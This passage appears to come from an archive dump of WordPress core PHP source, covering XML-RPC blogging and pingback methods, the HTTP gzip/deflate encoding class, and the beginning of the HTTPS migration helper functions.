$post_modified = $this->_convert_date( $entry['post_modified'] );
$post_modified_gmt = $this->_convert_date_gmt( $entry['post_modified_gmt'], $entry['post_modified'] );
$categories = array();
$cat_ids = wp_get_post_categories( $entry['ID'] );
foreach ( $cat_ids as $cat_id ) {
$categories[] = get_cat_name( $cat_id );
}
$tagnames = array();
$tags = wp_get_post_tags( $entry['ID'] );
if ( ! empty( $tags ) ) {
foreach ( $tags as $tag ) {
$tagnames[] = $tag->name;
}
$tagnames = implode( ', ', $tagnames );
} else {
$tagnames = '';
}
$post = get_extended( $entry['post_content'] );
$link = get_permalink( $entry['ID'] );
// Get the post author info.
$author = get_userdata( $entry['post_author'] );
$allow_comments = ( 'open' === $entry['comment_status'] ) ? 1 : 0;
$allow_pings = ( 'open' === $entry['ping_status'] ) ? 1 : 0;
// Consider future posts as published.
if ( 'future' === $entry['post_status'] ) {
$entry['post_status'] = 'publish';
}
// Get post format.
$post_format = get_post_format( $entry['ID'] );
if ( empty( $post_format ) ) {
$post_format = 'standard';
}
$recent_posts[] = array(
'dateCreated' => $post_date,
'userid' => $entry['post_author'],
'postid' => (string) $entry['ID'],
'description' => $post['main'],
'title' => $entry['post_title'],
'link' => $link,
'permaLink' => $link,
// Commented out because no other tool seems to use this.
// 'content' => $entry['post_content'],
'categories' => $categories,
'mt_excerpt' => $entry['post_excerpt'],
'mt_text_more' => $post['extended'],
'wp_more_text' => $post['more_text'],
'mt_allow_comments' => $allow_comments,
'mt_allow_pings' => $allow_pings,
'mt_keywords' => $tagnames,
'wp_slug' => $entry['post_name'],
'wp_password' => $entry['post_password'],
'wp_author_id' => (string) $author->ID,
'wp_author_display_name' => $author->display_name,
'date_created_gmt' => $post_date_gmt,
'post_status' => $entry['post_status'],
'custom_fields' => $this->get_custom_fields( $entry['ID'] ),
'wp_post_format' => $post_format,
'date_modified' => $post_modified,
'date_modified_gmt' => $post_modified_gmt,
'sticky' => ( 'post' === $entry['post_type'] && is_sticky( $entry['ID'] ) ),
'wp_post_thumbnail' => get_post_thumbnail_id( $entry['ID'] ),
);
}
return $recent_posts;
}
/**
* Retrieves the list of categories on a given blog.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mw_getCategories( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view categories.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.getCategories', $args, $this );
$categories_struct = array();
$cats = get_categories( array( 'get' => 'all' ) );
if ( $cats ) {
foreach ( $cats as $cat ) {
$struct = array();
$struct['categoryId'] = $cat->term_id;
$struct['parentId'] = $cat->parent;
$struct['description'] = $cat->name;
$struct['categoryDescription'] = $cat->description;
$struct['categoryName'] = $cat->name;
$struct['htmlUrl'] = esc_html( get_category_link( $cat->term_id ) );
$struct['rssUrl'] = esc_html( get_category_feed_link( $cat->term_id, 'rss2' ) );
$categories_struct[] = $struct;
}
}
return $categories_struct;
}
/**
* Uploads a file, following your settings.
*
* Adapted from a patch by Johann Richard.
*
* @link http://mycvs.org/archives/2004/06/30/file-upload-to-wordpress-in-ecto/
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Data.
* }
* @return array|IXR_Error
*/
public function mw_newMediaObject( $args ) {
$username = $this->escape( $args[1] );
$password = $this->escape( $args[2] );
$data = $args[3];
$name = sanitize_file_name( $data['name'] );
$type = $data['type'];
$bits = $data['bits'];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'metaWeblog.newMediaObject', $args, $this );
if ( ! current_user_can( 'upload_files' ) ) {
$this->error = new IXR_Error( 401, __( 'Sorry, you are not allowed to upload files.' ) );
return $this->error;
}
if ( is_multisite() && upload_is_user_over_quota( false ) ) {
$this->error = new IXR_Error(
401,
sprintf(
/* translators: %s: Allowed space allocation. */
__( 'Sorry, you have used your space allocation of %s. Please delete some files to upload more files.' ),
size_format( get_space_allowed() * MB_IN_BYTES )
)
);
return $this->error;
}
/**
* Filters whether to preempt the XML-RPC media upload.
*
* Returning a truthy value will effectively short-circuit the media upload,
* returning that value as a 500 error instead.
*
* @since 2.1.0
*
* @param bool $error Whether to pre-empt the media upload. Default false.
*/
$upload_err = apply_filters( 'pre_upload_error', false );
if ( $upload_err ) {
return new IXR_Error( 500, $upload_err );
}
$upload = wp_upload_bits( $name, null, $bits );
if ( ! empty( $upload['error'] ) ) {
/* translators: 1: File name, 2: Error message. */
$error_string = sprintf( __( 'Could not write file %1$s (%2$s).' ), $name, $upload['error'] );
return new IXR_Error( 500, $error_string );
}
// Construct the attachment array.
$post_id = 0;
if ( ! empty( $data['post_id'] ) ) {
$post_id = (int) $data['post_id'];
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
}
$attachment = array(
'post_title' => $name,
'post_content' => '',
'post_type' => 'attachment',
'post_parent' => $post_id,
'post_mime_type' => $type,
'guid' => $upload['url'],
);
// Save the data.
$attachment_id = wp_insert_attachment( $attachment, $upload['file'], $post_id );
wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
/**
* Fires after a new attachment has been added via the XML-RPC MovableType API.
*
* @since 3.4.0
*
* @param int $attachment_id ID of the new attachment.
* @param array $args An array of arguments to add the attachment.
*/
do_action( 'xmlrpc_call_success_mw_newMediaObject', $attachment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
$struct = $this->_prepare_media_item( get_post( $attachment_id ) );
// Deprecated values.
$struct['id'] = $struct['attachment_id'];
$struct['file'] = $struct['title'];
$struct['url'] = $struct['link'];
return $struct;
}
/*
* MovableType API functions.
* Specs archive on https://web.archive.org/web/20050220091302/http://www.movabletype.org/docs/mtmanual_programmatic.html
*/
/**
* Retrieves the post titles of recent posts.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Optional. Number of posts.
* }
* @return array|IXR_Error
*/
public function mt_getRecentPostTitles( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
if ( isset( $args[3] ) ) {
$query = array( 'numberposts' => absint( $args[3] ) );
} else {
$query = array();
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getRecentPostTitles', $args, $this );
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
$this->error = new IXR_Error( 500, __( 'No posts found or an error occurred while retrieving posts.' ) );
return $this->error;
}
$recent_posts = array();
foreach ( $posts_list as $entry ) {
if ( ! current_user_can( 'edit_post', $entry['ID'] ) ) {
continue;
}
$post_date = $this->_convert_date( $entry['post_date'] );
$post_date_gmt = $this->_convert_date_gmt( $entry['post_date_gmt'], $entry['post_date'] );
$recent_posts[] = array(
'dateCreated' => $post_date,
'userid' => $entry['post_author'],
'postid' => (string) $entry['ID'],
'title' => $entry['post_title'],
'post_status' => $entry['post_status'],
'date_created_gmt' => $post_date_gmt,
);
}
return $recent_posts;
}
/**
* Retrieves the list of all categories on a blog.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mt_getCategoryList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view categories.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getCategoryList', $args, $this );
$categories_struct = array();
$cats = get_categories(
array(
'hide_empty' => 0,
'hierarchical' => 0,
)
);
if ( $cats ) {
foreach ( $cats as $cat ) {
$struct = array();
$struct['categoryId'] = $cat->term_id;
$struct['categoryName'] = $cat->name;
$categories_struct[] = $struct;
}
}
return $categories_struct;
}
/**
* Retrieves post categories.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function mt_getPostCategories( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! get_post( $post_id ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getPostCategories', $args, $this );
$categories = array();
$cat_ids = wp_get_post_categories( (int) $post_id );
// First listed category will be the primary category.
$is_primary = true;
foreach ( $cat_ids as $cat_id ) {
$categories[] = array(
'categoryName' => get_cat_name( $cat_id ),
'categoryId' => (string) $cat_id,
'isPrimary' => $is_primary,
);
$is_primary = false;
}
return $categories;
}
/**
* Sets categories for a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Categories.
* }
* @return true|IXR_Error True on success.
*/
public function mt_setPostCategories( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$categories = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.setPostCategories', $args, $this );
if ( ! get_post( $post_id ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
$cat_ids = array();
foreach ( $categories as $cat ) {
$cat_ids[] = $cat['categoryId'];
}
wp_set_post_categories( $post_id, $cat_ids );
return true;
}
/**
* Retrieves an array of methods supported by this server.
*
* @since 1.5.0
*
* @return array
*/
public function mt_supportedMethods() {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.supportedMethods', array(), $this );
return array_keys( $this->methods );
}
/**
* Retrieves an empty array because we don't support per-post text filters.
*
* @since 1.5.0
*/
public function mt_supportedTextFilters() {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.supportedTextFilters', array(), $this );
/**
* Filters the MoveableType text filters list for XML-RPC.
*
* @since 2.2.0
*
* @param array $filters An array of text filters.
*/
return apply_filters( 'xmlrpc_text_filters', array() );
}
/**
* Retrieves trackbacks sent to a given post.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param int $post_id
* @return array|IXR_Error
*/
public function mt_getTrackbackPings( $post_id ) {
global $wpdb;
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.getTrackbackPings', $post_id, $this );
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post ) {
return new IXR_Error( 404, __( 'Sorry, no such post.' ) );
}
$comments = $wpdb->get_results( $wpdb->prepare( "SELECT comment_author_url, comment_content, comment_author_IP, comment_type FROM $wpdb->comments WHERE comment_post_ID = %d", $post_id ) );
if ( ! $comments ) {
return array();
}
$trackback_pings = array();
foreach ( $comments as $comment ) {
if ( 'trackback' === $comment->comment_type ) {
$content = $comment->comment_content;
$title = substr( $content, 8, ( strpos( $content, '</strong>' ) - 8 ) );
$trackback_pings[] = array(
'pingTitle' => $title,
'pingURL' => $comment->comment_author_url,
'pingIP' => $comment->comment_author_IP,
);
}
}
return $trackback_pings;
}
/**
* Sets a post's publish status to 'publish'.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Post ID.
* @type string $1 Username.
* @type string $2 Password.
* }
* @return int|IXR_Error
*/
public function mt_publishPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'mt.publishPost', $args, $this );
$postdata = get_post( $post_id, ARRAY_A );
if ( ! $postdata ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'publish_posts' ) || ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to publish this post.' ) );
}
$postdata['post_status'] = 'publish';
// Retain old categories.
$postdata['post_category'] = wp_get_post_categories( $post_id );
$this->escape( $postdata );
return wp_update_post( $postdata );
}
/*
* Pingback functions.
* Specs on www.hixie.ch/specs/pingback/pingback
*/
/**
* Retrieves a pingback and registers it.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 URL of page linked from.
* @type string $1 URL of page linked to.
* }
* @return string|IXR_Error
*/
public function pingback_ping( $args ) {
global $wpdb;
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'pingback.ping', $args, $this );
$this->escape( $args );
$pagelinkedfrom = str_replace( '&', '&', $args[0] );
$pagelinkedto = str_replace( '&', '&', $args[1] );
$pagelinkedto = str_replace( '&', '&', $pagelinkedto );
/**
* Filters the pingback source URI.
*
* @since 3.6.0
*
* @param string $pagelinkedfrom URI of the page linked from.
* @param string $pagelinkedto URI of the page linked to.
*/
$pagelinkedfrom = apply_filters( 'pingback_ping_source_uri', $pagelinkedfrom, $pagelinkedto );
if ( ! $pagelinkedfrom ) {
return $this->pingback_error( 0, __( 'A valid URL was not provided.' ) );
}
// Check if the page linked to is on our site.
$pos1 = strpos( $pagelinkedto, str_replace( array( 'http://www.', 'http://', 'https://www.', 'https://' ), '', get_option( 'home' ) ) );
if ( ! $pos1 ) {
return $this->pingback_error( 0, __( 'Is there no link to us?' ) );
}
/*
* Let's find which post is linked to.
* FIXME: Does url_to_postid() cover all these cases already?
* If so, then let's use it and drop the old code.
*/
$urltest = parse_url( $pagelinkedto );
$post_id = url_to_postid( $pagelinkedto );
if ( $post_id ) {
// $way
} elseif ( isset( $urltest['path'] ) && preg_match( '#p/[0-9]{1,}#', $urltest['path'], $match ) ) {
// The path defines the post_ID (archives/p/XXXX).
$blah = explode( '/', $match[0] );
$post_id = (int) $blah[1];
} elseif ( isset( $urltest['query'] ) && preg_match( '#p=[0-9]{1,}#', $urltest['query'], $match ) ) {
// The query string defines the post_ID (?p=XXXX).
$blah = explode( '=', $match[0] );
$post_id = (int) $blah[1];
} elseif ( isset( $urltest['fragment'] ) ) {
// An #anchor is there, it's either...
if ( (int) $urltest['fragment'] ) {
// ...an integer #XXXX (simplest case),
$post_id = (int) $urltest['fragment'];
} elseif ( preg_match( '/post-[0-9]+/', $urltest['fragment'] ) ) {
// ...a post ID in the form 'post-###',
$post_id = preg_replace( '/[^0-9]+/', '', $urltest['fragment'] );
} elseif ( is_string( $urltest['fragment'] ) ) {
// ...or a string #title, a little more complicated.
$title = preg_replace( '/[^a-z0-9]/i', '.', $urltest['fragment'] );
$sql = $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE post_title RLIKE %s", $title );
$post_id = $wpdb->get_var( $sql );
if ( ! $post_id ) {
// Returning unknown error '0' is better than die()'ing.
return $this->pingback_error( 0, '' );
}
}
} else {
// TODO: Attempt to extract a post ID from the given URL.
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
$post_id = (int) $post_id;
$post = get_post( $post_id );
if ( ! $post ) { // Post not found.
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
if ( url_to_postid( $pagelinkedfrom ) === $post_id ) {
return $this->pingback_error( 0, __( 'The source URL and the target URL cannot both point to the same resource.' ) );
}
// Check if pings are on.
if ( ! pings_open( $post ) ) {
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
// Let's check that the remote site didn't already pingback this entry.
if ( $wpdb->get_results( $wpdb->prepare( "SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d AND comment_author_url = %s", $post_id, $pagelinkedfrom ) ) ) {
return $this->pingback_error( 48, __( 'The pingback has already been registered.' ) );
}
/*
* The remote site may have sent the pingback before it finished publishing its own content
* containing this pingback URL. If that happens then it won't be immediately possible to fetch
* the pinging post; adding a small delay reduces the likelihood of this happening.
*
* While there are more robust methods than calling `sleep()` here (because `sleep()` merely
* mitigates the risk of requesting the remote post before it's available), this is effective
* enough for most cases and avoids introducing more complexity into this code.
*
* One way to improve the reliability of this code might be to add failure-handling to the remote
* fetch and retry up to a set number of times if it receives a 404. This could also handle 401 and
* 403 responses to differentiate the "does not exist" failure from the "may not access" failure.
*/
sleep( 1 );
$remote_ip = preg_replace( '/[^0-9a-fA-F:., ]/', '', $_SERVER['REMOTE_ADDR'] );
/** This filter is documented in wp-includes/class-wp-http.php */
$user_agent = apply_filters( 'http_headers_useragent', 'WordPress/' . get_bloginfo( 'version' ) . '; ' . get_bloginfo( 'url' ), $pagelinkedfrom );
// Let's check the remote site.
$http_api_args = array(
'timeout' => 10,
'redirection' => 0,
'limit_response_size' => 153600, // 150 KB
'user-agent' => "$user_agent; verifying pingback from $remote_ip",
'headers' => array(
'X-Pingback-Forwarded-For' => $remote_ip,
),
);
$request = wp_safe_remote_get( $pagelinkedfrom, $http_api_args );
$remote_source = wp_remote_retrieve_body( $request );
$remote_source_original = $remote_source;
if ( ! $remote_source ) {
return $this->pingback_error( 16, __( 'The source URL does not exist.' ) );
}
/**
* Filters the pingback remote source.
*
* @since 2.5.0
*
* @param string $remote_source Response source for the page linked from.
* @param string $pagelinkedto URL of the page linked to.
*/
$remote_source = apply_filters( 'pre_remote_source', $remote_source, $pagelinkedto );
// Work around bug in strip_tags():
$remote_source = str_replace( '<!DOC', '<DOC', $remote_source );
$remote_source = preg_replace( '/[\r\n\t ]+/', ' ', $remote_source ); // normalize spaces
$remote_source = preg_replace( '/<\/*(h1|h2|h3|h4|h5|h6|p|th|td|li|dt|dd|pre|caption|input|textarea|button|body)[^>]*>/', "\n\n", $remote_source );
preg_match( '|<title>([^<]*?)</title>|is', $remote_source, $matchtitle );
$title = isset( $matchtitle[1] ) ? $matchtitle[1] : '';
if ( empty( $title ) ) {
return $this->pingback_error( 32, __( 'A title on that page cannot be found.' ) );
}
// Remove all script and style tags including their content.
$remote_source = preg_replace( '@<(script|style)[^>]*?>.*?</\\1>@si', '', $remote_source );
// Just keep the tag we need.
$remote_source = strip_tags( $remote_source, '<a>' );
$p = explode( "\n\n", $remote_source );
$preg_target = preg_quote( $pagelinkedto, '|' );
foreach ( $p as $para ) {
if ( str_contains( $para, $pagelinkedto ) ) { // It exists, but is it a link?
preg_match( '|<a[^>]+?' . $preg_target . '[^>]*>([^>]+?)</a>|', $para, $context );
// If the URL isn't in a link context, keep looking.
if ( empty( $context ) ) {
continue;
}
/*
* We're going to use this fake tag to mark the context in a bit.
* The marker is needed in case the link text appears more than once in the paragraph.
*/
$excerpt = preg_replace( '|\</?wpcontext\>|', '', $para );
// prevent really long link text
if ( strlen( $context[1] ) > 100 ) {
$context[1] = substr( $context[1], 0, 100 ) . '…';
}
$marker = '<wpcontext>' . $context[1] . '</wpcontext>'; // Set up our marker.
$excerpt = str_replace( $context[0], $marker, $excerpt ); // Swap out the link for our marker.
$excerpt = strip_tags( $excerpt, '<wpcontext>' ); // Strip all tags but our context marker.
$excerpt = trim( $excerpt );
$preg_marker = preg_quote( $marker, '|' );
$excerpt = preg_replace( "|.*?\s(.{0,100}$preg_marker.{0,100})\s.*|s", '$1', $excerpt );
$excerpt = strip_tags( $excerpt ); // YES, again, to remove the marker wrapper.
break;
}
}
if ( empty( $context ) ) { // Link to target not found.
return $this->pingback_error( 17, __( 'The source URL does not contain a link to the target URL, and so cannot be used as a source.' ) );
}
$pagelinkedfrom = str_replace( '&', '&', $pagelinkedfrom );
$context = '[…] ' . esc_html( $excerpt ) . ' […]';
$pagelinkedfrom = $this->escape( $pagelinkedfrom );
$comment_post_id = (int) $post_id;
$comment_author = $title;
$comment_author_email = '';
$this->escape( $comment_author );
$comment_author_url = $pagelinkedfrom;
$comment_content = $context;
$this->escape( $comment_content );
$comment_type = 'pingback';
$commentdata = array(
'comment_post_ID' => $comment_post_id,
);
$commentdata += compact(
'comment_author',
'comment_author_url',
'comment_author_email',
'comment_content',
'comment_type',
'remote_source',
'remote_source_original'
);
$comment_id = wp_new_comment( $commentdata );
if ( is_wp_error( $comment_id ) ) {
return $this->pingback_error( 0, $comment_id->get_error_message() );
}
/**
* Fires after a post pingback has been sent.
*
* @since 0.71
*
* @param int $comment_id Comment ID.
*/
do_action( 'pingback_post', $comment_id );
/* translators: 1: URL of the page linked from, 2: URL of the page linked to. */
return sprintf( __( 'Pingback from %1$s to %2$s registered. Keep the web talking! :-)' ), $pagelinkedfrom, $pagelinkedto );
}
/**
* Retrieves an array of URLs that pingbacked the given URL.
*
* Specs on http://www.aquarionics.com/misc/archives/blogite/0198.html
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $url
* @return array|IXR_Error
*/
public function pingback_extensions_getPingbacks( $url ) {
global $wpdb;
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'pingback.extensions.getPingbacks', $url, $this );
$url = $this->escape( $url );
$post_id = url_to_postid( $url );
if ( ! $post_id ) {
// We aren't sure that the resource is available and/or pingback enabled.
return $this->pingback_error( 33, __( 'The specified target URL cannot be used as a target. It either does not exist, or it is not a pingback-enabled resource.' ) );
}
$actual_post = get_post( $post_id, ARRAY_A );
if ( ! $actual_post ) {
// No such post = resource not found.
return $this->pingback_error( 32, __( 'The specified target URL does not exist.' ) );
}
$comments = $wpdb->get_results( $wpdb->prepare( "SELECT comment_author_url, comment_content, comment_author_IP, comment_type FROM $wpdb->comments WHERE comment_post_ID = %d", $post_id ) );
if ( ! $comments ) {
return array();
}
$pingbacks = array();
foreach ( $comments as $comment ) {
if ( 'pingback' === $comment->comment_type ) {
$pingbacks[] = $comment->comment_author_url;
}
}
return $pingbacks;
}
/**
* Sends a pingback error based on the given error code and message.
*
* @since 3.6.0
*
* @param int $code Error code.
* @param string $message Error message.
* @return IXR_Error Error object.
*/
protected function pingback_error( $code, $message ) {
/**
* Filters the XML-RPC pingback error return.
*
* @since 3.5.1
*
* @param IXR_Error $error An IXR_Error object containing the error code and message.
*/
return apply_filters( 'xmlrpc_pingback_error', new IXR_Error( $code, $message ) );
}
}
class-wp-http-encoding.php 0000666 00000015041 15224151221 0011547 0 ustar 00 <?php
/**
* HTTP API: WP_Http_Encoding class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to implement deflate and gzip transfer encoding support for HTTP requests.
*
* Includes RFC 1950, RFC 1951, and RFC 1952.
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_Http_Encoding {
/**
* Compress raw string using the deflate format.
*
* Supports the RFC 1951 standard.
*
* @since 2.8.0
*
* @param string $raw String to compress.
* @param int $level Optional. Compression level, 9 is highest. Default 9.
* @param string $supports Optional, not used. When implemented it will choose
* the right compression based on what the server supports.
* @return string|false Compressed string on success, false on failure.
*/
public static function compress( $raw, $level = 9, $supports = null ) {
return gzdeflate( $raw, $level );
}
/**
* Decompression of deflated string.
*
* Will attempt to decompress using the RFC 1950 standard, and if that fails
* then the RFC 1951 standard deflate will be attempted. Finally, the RFC
* 1952 standard gzip decode will be attempted. If all fail, then the
* original compressed string will be returned.
*
* @since 2.8.0
*
* @param string $compressed String to decompress.
* @param int $length The optional length of the compressed data.
* @return string|false Decompressed string on success, false on failure.
*/
public static function decompress( $compressed, $length = null ) {
if ( empty( $compressed ) ) {
return $compressed;
}
$decompressed = @gzinflate( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
$decompressed = self::compatible_gzinflate( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
$decompressed = @gzuncompress( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
if ( function_exists( 'gzdecode' ) ) {
$decompressed = @gzdecode( $compressed );
if ( false !== $decompressed ) {
return $decompressed;
}
}
return $compressed;
}
/**
* Decompression of deflated string while staying compatible with the majority of servers.
*
* Certain Servers will return deflated data with headers which PHP's gzinflate()
* function cannot handle out of the box. The following function has been created from
* various snippets on the gzinflate() PHP documentation.
*
* Warning: Magic numbers within. Due to the potential different formats that the compressed
* data may be returned in, some "magic offsets" are needed to ensure proper decompression
* takes place. For a simple pragmatic way to determine the magic offset in use, see:
* https://core.trac.wordpress.org/ticket/18273
*
* @since 2.8.1
*
* @link https://core.trac.wordpress.org/ticket/18273
* @link https://www.php.net/manual/en/function.gzinflate.php#70875
* @link https://www.php.net/manual/en/function.gzinflate.php#77336
*
* @param string $gz_data String to decompress.
* @return string|false Decompressed string on success, false on failure.
*/
public static function compatible_gzinflate( $gz_data ) {
// Compressed data might contain a full header, if so strip it for gzinflate().
if ( str_starts_with( $gz_data, "\x1f\x8b\x08" ) ) {
$i = 10;
$flg = ord( substr( $gz_data, 3, 1 ) );
if ( $flg > 0 ) {
if ( $flg & 4 ) {
list($xlen) = unpack( 'v', substr( $gz_data, $i, 2 ) );
$i = $i + 2 + $xlen;
}
if ( $flg & 8 ) {
$i = strpos( $gz_data, "\0", $i ) + 1;
}
if ( $flg & 16 ) {
$i = strpos( $gz_data, "\0", $i ) + 1;
}
if ( $flg & 2 ) {
$i = $i + 2;
}
}
$decompressed = @gzinflate( substr( $gz_data, $i, -8 ) );
if ( false !== $decompressed ) {
return $decompressed;
}
}
// Compressed data from java.util.zip.Deflater amongst others.
$decompressed = @gzinflate( substr( $gz_data, 2 ) );
if ( false !== $decompressed ) {
return $decompressed;
}
return false;
}
/**
* What encoding types to accept and their priority values.
*
* @since 2.8.0
*
* @param string $url
* @param array $args
* @return string Types of encoding to accept.
*/
public static function accept_encoding( $url, $args ) {
$type = array();
$compression_enabled = self::is_available();
if ( ! $args['decompress'] ) { // Decompression specifically disabled.
$compression_enabled = false;
} elseif ( $args['stream'] ) { // Disable when streaming to file.
$compression_enabled = false;
} elseif ( isset( $args['limit_response_size'] ) ) { // If only partial content is being requested, we won't be able to decompress it.
$compression_enabled = false;
}
if ( $compression_enabled ) {
if ( function_exists( 'gzinflate' ) ) {
$type[] = 'deflate;q=1.0';
}
if ( function_exists( 'gzuncompress' ) ) {
$type[] = 'compress;q=0.5';
}
if ( function_exists( 'gzdecode' ) ) {
$type[] = 'gzip;q=0.5';
}
}
/**
* Filters the allowed encoding types.
*
* @since 3.6.0
*
* @param string[] $type Array of what encoding types to accept and their priority values.
* @param string $url URL of the HTTP request.
* @param array $args HTTP request arguments.
*/
$type = apply_filters( 'wp_http_accept_encoding', $type, $url, $args );
return implode( ', ', $type );
}
/**
* What encoding the content used when it was compressed to send in the headers.
*
* @since 2.8.0
*
* @return string Content-Encoding string to send in the header.
*/
public static function content_encoding() {
return 'deflate';
}
/**
* Whether the content be decoded based on the headers.
*
* @since 2.8.0
*
* @param array|string $headers All of the available headers.
* @return bool
*/
public static function should_decode( $headers ) {
if ( is_array( $headers ) ) {
if ( array_key_exists( 'content-encoding', $headers ) && ! empty( $headers['content-encoding'] ) ) {
return true;
}
} elseif ( is_string( $headers ) ) {
return ( stripos( $headers, 'content-encoding:' ) !== false );
}
return false;
}
/**
* Whether decompression and compression are supported by the PHP version.
*
* Each function is tested instead of checking for the zlib extension, to
* ensure that the functions all exist in the PHP version and aren't
* disabled.
*
* @since 2.8.0
*
* @return bool
*/
public static function is_available() {
return ( function_exists( 'gzuncompress' ) || function_exists( 'gzdeflate' ) || function_exists( 'gzinflate' ) );
}
}
https-migration-20260605080448.php 0000666 00000011205 15224151221 0011776 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
